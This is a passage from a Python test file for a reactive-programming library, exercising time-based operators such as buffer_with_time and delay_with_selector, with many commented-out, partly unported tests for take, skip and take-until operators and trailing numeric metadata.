results.messages.assert_equal(on_next(300, "2,3,4"), on_next(370, "4,5,6"), on_next(440, "6,7,8"), on_next(510, "8,9"), on_next(580, ""), on_next(600, ""), on_completed(600))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_buffer_with_time_error():
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8), on_next(470, 9), on_error(600, ex))
def create():
return xs.buffer_with_time(100, 70, scheduler=scheduler).select(lambda x: ",".join([str(a) for a in x]))
results = scheduler.start(create)
results.messages.assert_equal(on_next(300, "2,3,4"), on_next(370, "4,5,6"), on_next(440, "6,7,8"), on_next(510, "8,9"), on_next(580, ""), on_error(600, ex))
xs.subscriptions.assert_equal(subscribe(200, 600))
def test_buffer_with_time_disposed():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
return xs.buffer_with_time(100, 70, scheduler=scheduler).select(lambda x: ",".join([str(a) for a in x]))
results = scheduler.start(create, disposed=370)
results.messages.assert_equal(on_next(300, "2,3,4"))
xs.subscriptions.assert_equal(subscribe(200, 370))
def test_buffer_with_time_basic_same():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(100, 1), on_next(210, 2), on_next(240, 3), on_next(280, 4), on_next(320, 5), on_next(350, 6), on_next(380, 7), on_next(420, 8), on_next(470, 9), on_completed(600))
def create():
return xs.buffer_with_time(100, scheduler=scheduler).select(lambda x: ",".join([str(a) for a in x]))
results = scheduler.start(create)
results.messages.assert_equal(on_next(300, "2,3,4"), on_next(400, "5,6,7"), on_next(500, "8,9"), on_next(600, ""), on_completed(600))
xs.subscriptions.assert_equal(subscribe(200, 600))
# Delay with selector
def test_delay_duration_simple1():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 10), on_next(220, 30), on_next(230, 50), on_next(240, 35), on_next(250, 20), on_completed(260))
def create():
def selector(x):
return scheduler.create_cold_observable(on_next(x, '!'))
return xs.delay_with_selector(selector)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210 + 10, 10), on_next(220 + 30, 30), on_next(250 + 20, 20), on_next(240 + 35, 35), on_next(230 + 50, 50), on_completed(280))
xs.subscriptions.assert_equal(subscribe(200, 260))
def test_delay_duration_simple2():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(220, 3), on_next(230, 4), on_next(240, 5), on_next(250, 6), on_completed(300))
ys = scheduler.create_cold_observable(on_next(10, '!'))
def create():
return xs.delay_with_selector(lambda _: ys)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210 + 10, 2), on_next(220 + 10, 3), on_next(230 + 10, 4), on_next(240 + 10, 5), on_next(250 + 10, 6), on_completed(300))
xs.subscriptions.assert_equal(subscribe(200, 300))
ys.subscriptions.assert_equal(subscribe(210, 220), subscribe(220, 230), subscribe(230, 240), subscribe(240, 250), subscribe(250, 260))
def test_delay_duration_simple3():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(220, 3), on_next(230, 4), on_next(240, 5), on_next(250, 6), on_completed(300))
ys = scheduler.create_cold_observable(on_next(100, '!'))
def create():
return xs.delay_with_selector(lambda _: ys)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210 + 100, 2), on_next(220 + 100, 3), on_next(230 + 100, 4), on_next(240 + 100, 5), on_next(250 + 100, 6), on_completed(350))
xs.subscriptions.assert_equal(subscribe(200, 300))
ys.subscriptions.assert_equal(subscribe(210, 310), subscribe(220, 320), subscribe(230, 330), subscribe(240, 340), subscribe(250, 350))
def test_delay_duration_simple4_inner_empty():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(220, 3), on_next(230, 4), on_next(240, 5), on_next(250, 6), on_completed(300))
ys = scheduler.create_cold_observable(on_completed(100))
def create():
return xs.delay_with_selector(lambda _: ys)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210 + 100, 2), on_next(220 + 100, 3), on_next(230 + 100, 4), on_next(240 + 100, 5), on_next(250 + 100, 6), on_completed(350))
xs.subscriptions.assert_equal(subscribe(200, 300))
ys.subscriptions.assert_equal(subscribe(210, 310), subscribe(220, 320), subscribe(230, 330), subscribe(240, 340), subscribe(250, 350))
def test_delay_duration_dispose1():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(220, 3), on_next(230, 4), on_next(240, 5), on_next(250, 6), on_completed(300))
ys = scheduler.create_cold_observable(on_next(200, '!'))
def create():
return xs.delay_with_selector(lambda _: ys)
results = scheduler.start(create, disposed=425)
results.messages.assert_equal(on_next(210 + 200, 2), on_next(220 + 200, 3))
xs.subscriptions.assert_equal(subscribe(200, 300))
ys.subscriptions.assert_equal(subscribe(210, 410), subscribe(220, 420), subscribe(230, 425), subscribe(240, 425), subscribe(250, 425))
def test_delay_duration_dispose2():
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(150, 1), on_next(210, 2), on_next(400, 3), on_completed(500))
ys = scheduler.create_cold_observable(on_next(50, '!'))
def create():
return xs.delay_with_selector(lambda _: ys)
results = scheduler.start(create, disposed=300)
results.messages.assert_equal(on_next(210 + 50, 2))
xs.subscriptions.assert_equal(subscribe(200, 300))
ys.subscriptions.assert_equal(subscribe(210, 260))
# // TakeLastBuffer
# def test_takeLastBuffer_with_time_Zero1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(0, scheduler)
# res.messages.assert_equal(on_next(230, function (lst) {
# return lst.length === 0
# }), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_takeLastBuffer_with_time_Zero2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(0, scheduler)
# res.messages.assert_equal(on_next(230, function (lst) {
# return lst.length === 0
# }), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# function arrayEqual(arr1, arr2) {
# if (arr1.length != arr2.length) return false
# for (var i = 0, len = arr1.length i < len i++) {
# if (arr1[i] != arr2[i]) return false
# }
# return true
# }
# def test_takeLastBuffer_with_time_Some1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(25, scheduler)
# res.messages.assert_equal(on_next(240, function (lst) {
# return arrayEqual(lst, [2, 3])
# }), on_completed(240))
# xs.subscriptions.assert_equal(subscribe(200, 240))
# def test_takeLastBuffer_with_time_Some2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(25, scheduler)
# res.messages.assert_equal(on_next(300, function (lst) {
# return lst.length === 0
# }), on_completed(300))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_takeLastBuffer_with_time_Some3():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_next(270, 7), on_next(280, 8), on_next(290, 9), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(45, scheduler)
# res.messages.assert_equal(on_next(300, function (lst) {
# return arrayEqual(lst, [6, 7, 8, 9])
# }), on_completed(300))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_takeLastBuffer_with_time_Some4():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(240, 2), on_next(250, 3), on_next(280, 4), on_next(290, 5), on_next(300, 6), on_completed(350))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(25, scheduler)
# res.messages.assert_equal(on_next(350, function (lst) {
# return lst.length === 0
# }), on_completed(350))
# xs.subscriptions.assert_equal(subscribe(200, 350))
# def test_takeLastBuffer_with_time_All():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(50, scheduler)
# res.messages.assert_equal(on_next(230, function (lst) {
# return arrayEqual(lst, [1, 2])
# }), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_takeLastBuffer_with_time_Error():
# var ex, res, scheduler, xs
# scheduler = TestScheduler()
# ex = 'ex'
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(50, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_takeLastBuffer_with_time_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.takeLastBuffer_with_time(50, scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# def test_Take_Zero():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeWithTime(0, scheduler)
# res.messages.assert_equal(on_completed(201))
# xs.subscriptions.assert_equal(subscribe(200, 201))
# def test_Take_Some():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
# res = scheduler.start(create)
# return xs.takeWithTime(25, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(225))
# xs.subscriptions.assert_equal(subscribe(200, 225))
# def test_Take_Late():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeWithTime(50, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_Take_Error():
# var ex, res, scheduler, xs
# scheduler = TestScheduler()
# ex = 'ex'
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.takeWithTime(50, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_Take_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.takeWithTime(50, scheduler)
# res.messages.assert_equal(on_completed(250))
# xs.subscriptions.assert_equal(subscribe(200, 250))
# def test_Take_Twice1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.takeWithTime(55, scheduler).takeWithTime(35, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(235))
# xs.subscriptions.assert_equal(subscribe(200, 235))
# def test_Take_Twice2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.takeWithTime(35, scheduler).takeWithTime(55, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(235))
# xs.subscriptions.assert_equal(subscribe(200, 235))
# // Skip
# def test_Skip_Zero():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipWithTime(0, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_Skip_Some():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipWithTime(15, scheduler)
# res.messages.assert_equal(on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_Skip_Late():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipWithTime(50, scheduler)
# res.messages.assert_equal(on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_Skip_Error():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.skipWithTime(50, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_Skip_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.skipWithTime(50, scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# def test_Skip_Twice1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.skipWithTime(15, scheduler).skipWithTime(30, scheduler)
# res.messages.assert_equal(on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# xs.subscriptions.assert_equal(subscribe(200, 270))
# def test_Skip_Twice2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.skipWithTime(30, scheduler).skipWithTime(15, scheduler)
# res.messages.assert_equal(on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# xs.subscriptions.assert_equal(subscribe(200, 270))
# // TakeLast
# def test_TakeLast_Zero1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(0, scheduler)
# res.messages.assert_equal(on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_Zero1_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(0, scheduler, scheduler)
# res.messages.assert_equal(on_completed(231))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_Zero2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(0, scheduler)
# res.messages.assert_equal(on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_Zero2_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(0, scheduler, scheduler)
# res.messages.assert_equal(on_completed(231))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_Some1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler)
# res.messages.assert_equal(on_next(240, 2), on_next(240, 3), on_completed(240))
# xs.subscriptions.assert_equal(subscribe(200, 240))
# def test_TakeLast_Some1_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler, scheduler)
# res.messages.assert_equal(on_next(241, 2), on_next(242, 3), on_completed(243))
# xs.subscriptions.assert_equal(subscribe(200, 240))
# def test_TakeLast_Some2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler)
# res.messages.assert_equal(on_completed(300))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_TakeLast_Some2_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler, scheduler)
# res.messages.assert_equal(on_completed(301))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_TakeLast_Some3():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_next(270, 7), on_next(280, 8), on_next(290, 9), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastWithTime(45, scheduler)
# res.messages.assert_equal(on_next(300, 6), on_next(300, 7), on_next(300, 8), on_next(300, 9), on_completed(300))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_TakeLast_Some3_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_next(270, 7), on_next(280, 8), on_next(290, 9), on_completed(300))
# res = scheduler.start(create)
# return xs.takeLastWithTime(45, scheduler, scheduler)
# res.messages.assert_equal(on_next(301, 6), on_next(302, 7), on_next(303, 8), on_next(304, 9), on_completed(305))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_TakeLast_Some4():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(240, 2), on_next(250, 3), on_next(280, 4), on_next(290, 5), on_next(300, 6), on_completed(350))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler)
# res.messages.assert_equal(on_completed(350))
# xs.subscriptions.assert_equal(subscribe(200, 350))
# def test_TakeLast_Some4_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(240, 2), on_next(250, 3), on_next(280, 4), on_next(290, 5), on_next(300, 6), on_completed(350))
# res = scheduler.start(create)
# return xs.takeLastWithTime(25, scheduler, scheduler)
# res.messages.assert_equal(on_completed(351))
# xs.subscriptions.assert_equal(subscribe(200, 350))
# def test_TakeLast_All():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler)
# res.messages.assert_equal(on_next(230, 1), on_next(230, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_All_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler, scheduler)
# res.messages.assert_equal(on_next(231, 1), on_next(232, 2), on_completed(233))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeLast_Error():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_TakeLast_Error_WithLoopScheduler():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_TakeLast_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# def test_TakeLast_Never_WithLoopScheduler():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.takeLastWithTime(50, scheduler, scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# // Skiplast
# def test_SkipLast_Zero1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipLastWithTime(0, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipLast_Zero2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# res = scheduler.start(create)
# return xs.skipLastWithTime(0, scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipLast_Some1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(230))
# res = scheduler.start(create)
# return xs.skipLastWithTime(15, scheduler)
# res.messages.assert_equal(on_next(230, 1), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipLast_Some2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_next(270, 7), on_next(280, 8), on_next(290, 9), on_completed(300))
# res = scheduler.start(create)
# return xs.skipLastWithTime(45, scheduler)
# res.messages.assert_equal(on_next(260, 1), on_next(270, 2), on_next(280, 3), on_next(290, 4), on_next(300, 5), on_completed(300))
# xs.subscriptions.assert_equal(subscribe(200, 300))
# def test_SkipLast_All():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipLastWithTime(45, scheduler)
# res.messages.assert_equal(on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipLast_Error():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.skipLastWithTime(45, scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_SkipLast_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.skipLastWithTime(50, scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# // SkipUntil
# def test_SkipUntil_Zero():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(0), scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipUntil_Late():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal(on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_SkipUntil_Error():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_SkipUntil_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal()
# xs.subscriptions.assert_equal(subscribe(200, 1000))
# def test_SkipUntil_Twice1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(215), scheduler).skipUntilWithTime(Date(230), scheduler)
# res.messages.assert_equal(on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# xs.subscriptions.assert_equal(subscribe(200, 270))
# def test_SkipUntil_Twice2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.skipUntilWithTime(Date(230), scheduler).skipUntilWithTime(Date(215), scheduler)
# res.messages.assert_equal(on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# xs.subscriptions.assert_equal(subscribe(200, 270))
# // TakeUntil
# def test_TakeUntil_Zero():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(0), scheduler)
# res.messages.assert_equal(on_completed(201))
# xs.subscriptions.assert_equal(subscribe(200, 201))
# def test_TakeUntil_Late():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_completed(230))
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_completed(230))
# xs.subscriptions.assert_equal(subscribe(200, 230))
# def test_TakeUntil_Error():
# var ex, res, scheduler, xs
# ex = 'ex'
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_error(210, ex))
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal(on_error(210, ex))
# xs.subscriptions.assert_equal(subscribe(200, 210))
# def test_TakeUntil_Never():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable()
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(250), scheduler)
# res.messages.assert_equal(on_completed(250))
# xs.subscriptions.assert_equal(subscribe(200, 250))
# def test_TakeUntil_Twice1():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(255), scheduler).takeUntilWithTime(Date(235), scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(235))
# xs.subscriptions.assert_equal(subscribe(200, 235))
# def test_TakeUntil_Twice2():
# var res, scheduler, xs
# scheduler = TestScheduler()
# xs = scheduler.create_hot_observable(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
# res = scheduler.start(create)
# return xs.takeUntilWithTime(Date(235), scheduler).takeUntilWithTime(Date(255), scheduler)
# res.messages.assert_equal(on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(235))
# xs.subscriptions.assert_equal(subscribe(200, 235))
if __name__ == '__main__':
#test_delay_timespan_simple1()
#test_delay_datetime_offset_simple1_impl()
#test_window_time_basic()
#test_timeout_timeout_not_occurs_error()
test_buffer_with_time_or_count_basic()
| 41.870396
| 530
| 0.675879
| 12,653
| 89,812
| 4.572591
| 0.025053
| 0.105882
| 0.071348
| 0.094111
| 0.929706
| 0.913701
| 0.901153
| 0.891145
| 0.873792
| 0.861089
| 0
| 0.093279
| 0.18473
| 89,812
| 2,144
| 531
| 41.889925
| 0.69689
| 0.310426
| 0
| 0.716165
| 0
| 0
| 0.008373
| 0
| 0
| 0
| 0
| 0
| 0.208647
| 1
| 0.221805
| false
| 0.005639
| 0.004699
| 0.092105
| 0.361842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
